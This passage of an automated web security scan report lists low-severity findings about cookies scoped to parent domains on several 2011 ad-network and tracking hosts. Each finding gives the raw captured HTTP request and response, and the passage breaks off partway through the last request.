Request

GET /getuid?http://cmap.an.ace.advertising.com/ancm.ashx?appnexus_uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZVGg1td>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3JWdNI6Q!=v6WStTMc

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 03:07:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 03:07:01 GMT; domain=.adnxs.com; HttpOnly
Location: http://cmap.an.ace.advertising.com/ancm.ashx?appnexus_uid=6422714091563403120
Date: Sun, 04 Sep 2011 03:07:01 GMT
Content-Length: 0


15.63. http://ib.adnxs.com/getuidnb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuidnb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidnb?http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3JWdNGUVRGA0S!<Gr@EhQk5

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 02:40:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 02:40:17 GMT; domain=.adnxs.com; HttpOnly
Location: http://pixel.rubiconproject.com/tap.php?v=4894&nid=1986&put=9223372036854775807&expires=30
Date: Sun, 04 Sep 2011 02:40:17 GMT
Content-Length: 0


15.64. http://ib.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?t=2&member=1001&user=9035684957&seg=170784&seg_code=33x&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26id%3D1418910&random=223894 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 02:25:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 02:25:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 02:25:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3JWdNGUVRGA0S!<Gr@EhQk5; path=/; expires=Sat, 03-Dec-2011 02:25:42 GMT; domain=.adnxs.com; HttpOnly
Location: http://ad.yieldmanager.com/pixel?t=2&id=1418910
Date: Sun, 04 Sep 2011 02:25:42 GMT
Content-Length: 0


15.65. http://ib.adnxs.com/pxj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=52&seg=95287&action=setuid%28%276731d4ad-7dae-4402-b507-a0bc233d79fb%27%29 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: uuid2=2230616255569715877; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6VB-Z@twQ.V#j3TGcl3r9]tNb2H[3NJi'/RQ^lF7-bypUl=]uPMlADVbh1Xcf-.v/g@WtYH4%4BKsvfI)9s4EoQJmiV9H9b?4<8)MQcdxHefR:'$*^yy9:+:'Xf45@1Guhn*A4/tD(Gb-[6p0L!b4%lBYpm$?rosNS+3l$_CCgCor`ci(S-[W5-4_298; icu=ChII9K4DEAoYASABKAEwzZ_u8gQQzZ_u8gQYAA..; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 03:58:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2230616255569715877; path=/; expires=Sat, 03-Dec-2011 03:58:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPhW!Tkfs1plXdWp+iUw-Twc<UJ8km?lj<>4IW5`wJa; path=/; expires=Sat, 03-Dec-2011 03:58:57 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 03:58:57 GMT

GIF89a.............!.......,........@..L..;

15.66. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=84598cb0-ae83-4275-b675-282e3e69bdcf HTTP/1.1
Host: idcs.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: T=1; uid=u=b302c5d5-65f2-40f8-a929-cb62b8ddcae9; sgm=7435=734382&7980=734355&7596=734356&8629=734368&6376=734377; tpd=e20=1315359826890&e90=1313372627004&e50=1315359827084&e100=1313372627366

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377; domain=.interclick.com; expires=Sat, 04-Sep-2021 03:59:22 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 04 Sep 2011 03:59:22 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

15.67. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; PUBRETARGET=78_1409703834.82_1409705283

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:44:50 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.1928_1315860702.78_1408030145.390_1321207886.2072_1316038897.1039_1316395932; domain=pubmatic.com; expires=Thu, 14-Aug-2014 15:29:05 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

15.68. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout?optout&nocache=0.3267692 HTTP/1.1
Host: img.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:12:58 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: u=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: b=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: n=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: s=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: f=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: e=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: t=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: c=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: p=OPTOUT; domain=.pulsemgr.com; path=/; expires=Sun, 18 Jan 2038 00:00:00 GMT
P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Location: http://img.pulsemgr.com/optout?oochk&user=OPTOUT
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://img.pulsemgr.com/optout?oochk&amp;user=O
...[SNIP]...

15.69. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; uid=1_1315097285_1314893682667:5756480826433243; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:10 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315106950_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 817

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAAB
...[SNIP]...

15.70. http://imp.fetchback.com/serve/fb/hover  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/hover

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/hover?tid=68324&crid=34024&cb=57823158 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315103291_34024:68324:1:0:0_34021:68285:1:6006:6006_34024:68283:2:6240:6332_34024:68292:2:125128:125210_34023:68293:1:125841:125841; uid=1_1315103291_1314893682667:5756480826433243; kwd=1_1315103291; scg=1_1315103291; ppd=1_1315103291; act=1_1315103291

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:31:44 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315107104_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:31:44 GMT; Path=/
Set-Cookie: eng=1_1315107104_34024:0_75:2282; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:31:44 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:31:44 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

15.71. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285; uid=1_1315103291_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:37 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315106977_34024:68324:2:0:3686_34021:68285:1:9692:9692_34024:68283:2:9926:10018_34024:68292:2:128814:128896_34023:68293:1:129527:129527; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: uid=1_1315106977_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: kwd=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: scg=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: ppd=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: act=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:37 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6022

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

15.72. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=170&g=001&j=j&s= HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJw1i8ENgCAMAHdhAtsChfoy8aEDOEBtYQGfxt0lJv4ulzsVlPsSknDsa5gHoYSzRFPw6pOinRlgiObNoIPWnOLXjWPZ%252FiMxeclJeQJkYiBkJ6tNHXo30jA%252FL%252B9SHFw%253D; BFF=eJxLtDK1qi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdameHVYgoVRzYFWa0xsoQhRMLRCd0UM5gETtUIc2rJsgGnaQCHKkJX; TFF=eJxLtLKwqi62MjSyUjI0MHEwsDBwsLS0NFKyTrQysqrOtDK0BmJzA3MgZQBj1mKoNwSpN0ZTb2QN4SLrM4drI04HkDYwwaHSCNPs1IjUnMSSVFxmo%252BuA%252BcKIRF8bkedrI2J9XQsAEUFntA%253D%253D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/json
Set-Cookie: BFF=eJxLtDKzqi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdaWeDVYgoVRzYFWa0xsoQhRMLRCd0UM5gETtXI5liCJMwN0A0xgQjDRWrJcgqJ1tYCAPQcUTc%253D; expires=Mon, 02-Jan-2012 03:08:47 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJxLtDI0sqouBpFKhgYmDgYWBg6WlpZGStaJVkCJTCtDayA2NzAHUgYwZi2GekOQemM09UbWEC6yPnO4NuJ0AGkDExwqTQ0wDU%252BNSM1JLEnFZbgpuntg%252FjAi0d9GBPxtYond40a4PY6hBWyXuYGDgYEh8W5DqCcpTiDaiI4TcwOiVNYCAIKnmg8%253D; expires=Mon, 02-Jan-2012 03:08:47 GMT; path=/; domain=.exelator.com
Date: Sun, 04 Sep 2011 03:08:47 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-5
Content-Length: 17

{"service": "on"}

15.73. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=104&g=280&absid=21051315103139790868608&j=0 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
